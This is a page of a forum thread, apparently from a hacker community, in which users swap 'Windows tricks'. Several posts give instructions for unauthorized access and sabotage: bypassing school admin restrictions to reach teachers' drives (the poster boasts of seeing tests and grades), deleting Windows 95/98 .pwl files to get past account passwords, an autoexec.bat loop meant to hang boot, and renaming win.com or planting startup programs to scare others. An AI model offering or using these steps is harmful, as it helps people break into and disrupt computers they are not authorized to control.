Page 3 of 4 FirstFirst 1234 LastLast

Thread: what are neat windows tricks

Cool

hey kid.. want some neat tricks? click ur wall paper and press F1 then seach for "keyboard shortcuts" then u will see a couple of neat tricks.. and incase u are running win98.. press start then go to run then type /con/con and press enter.. it will open a neat console for you that looks like a linux console.. and u can do some basic linux commands in it..

QUESTION - on that trick where you press print screen... what do i do with the real icons?
    i am the needle in your vein
    i am the high you can\'t sustain
    i am the pusher, i\'m a whore
    i am the need in you for more
    i am the bullet in the gun ( and i control you)
    i am the truth from which you run ( and i control you )
    i am a silencing machine ( and i control you )
    i am the end of all your dreams ( and i control you )

JÄ(\\/)鎲 ¼

QUESTION - on that trick where you press print screen... what do i do with the real icons?
    Hide them off of the screen

My favorite windows trick is trying to keep Windows ME up and running.
    And another trick is also, putting the program at the bottom, in the startup and rename the startup link as office or something that looks normal. When they log on or start the computer up it scares the hell out of them.
    [gloworange]\"A hacker is someone who has a passion for technology, someone who is possessed by a desire to figure out how things work.\" [/gloworange]

I have come to many a damsel's distress .....because I accessed the machune earlier and renamed win.com....They panic ...call me ..and I come to the rescue! LOL

A cool trick that I do to get passed the stupid system admin rights at my school is right click on a hardrive click create shortcut
    it will say somthing like can't create shortcut would you like to create one on the desktop hit yes. Once it's on your desktop right click hit Properties and change the target to like the C:\ drive at my school that's a drive we can't get into. Once you've done that you have access to all those programs that you shouldn't be allowed to have.

I found out that there were 6 different drives so far at my school and some of them were the teachers drives. With a little social engineering I was able to look at upcoming tests, grades, other people's homework. But with great power comes great responsiblilty and it isn't worth getting kicked out of school. I actually locked out a drive from my curiousity, and I doubt it's fixed yet. I'm just glad I didnt' get busted for it.

Neat Windows Tricks

Changing the password on windows 95 and 98 without knowing it.

1. Boot up into safe mode
    2. Start > Search > Search for "*.pwl" - without the quotes (pwl stands for password list)
    3. You will find whatever users have passwords on the machine
    such as Winblowsuser.pwl
    4. Delete the file
    5. Restart
    6. when the computer prompts you for Winblowsuser's password
    just press enter
    7. You can now go change the password [Becuase there is no old one]
    \\~-=-=====-=-~/
    |<DigitalEnigma>|
    /~-=-=====-=-~\\

Here's a great trick:

Append the following code to your "autoexec.bat" file.

----code---
    @cd>>x
    @%0
    ----code---

Save it, restart =

First of all this is nothing of mine, I think I saw it on b0g or somewhere.

I really don't know if this works because I have been too lazy to try it on one of my crappy boxes, what it supposedly does is copy the contents then loop and do it again, the loop is infinite (as you see). So (according to what I read) your comp will boot, display the "Starting MS-DOS" then freeze there and maybe crash?
    Anyway, feel free to try it and let me know if your not a lazy bastard like me.

-DarC
    (I love Linux : )
    The
    -(DiR)-

DarC Infinity Rising

Cool

haha capser u bastard! haha ur file scared the **** outta me!! hahahahah i swear.. i was about to have a heart attack!! haha

Lightbulb Shell

That nasty start menu etc. that hogs all your resources can be altered. In c:\windows\system.ini add the line shell=progman.exe this should stop the desktop loading and load the old Win3.1 "desktop". There are usefull alternatives, have a look on www.litestep.net. After that I quite like leaving messges for the Admin at our shcool in the Autoexec.bat file. Nothing mean of course:
    @echo off
    :1
    echo GET UNIX YOU FOOLS
    GOTO 1

Bye
    -=Plague of The IV=-

Two great things came from UC Berkely; LSD and BSD.
    :-)

Senior since the 3 dot era

Re: Neat Windows Tricks

Originally posted by DigitalEnigma
    Changing the password on windows 95 and 98 without knowing it.

1. Boot up into safe mode
    2. Start > Search > Search for "*.pwl" - without the quotes (pwl stands for password list)
    3. You will find whatever users have passwords on the machine
    such as Winblowsuser.pwl
    4. Delete the file
    5. Restart
    6. when the computer prompts you for Winblowsuser's password
    just press enter
    7. You can now go change the password [Becuase there is no old one]
    This was already been posted in other threads (still a good trick), there we discussed ways to do this *without* rebooting. For instance you can log in as a new user, go to c:\windows and delete *.pwl, log out.
    all users will come up without passwd.
    Or you can use some CD that autoruns and disables the passwd for you.

I can not remember the thread about this but it is somewhere on AO.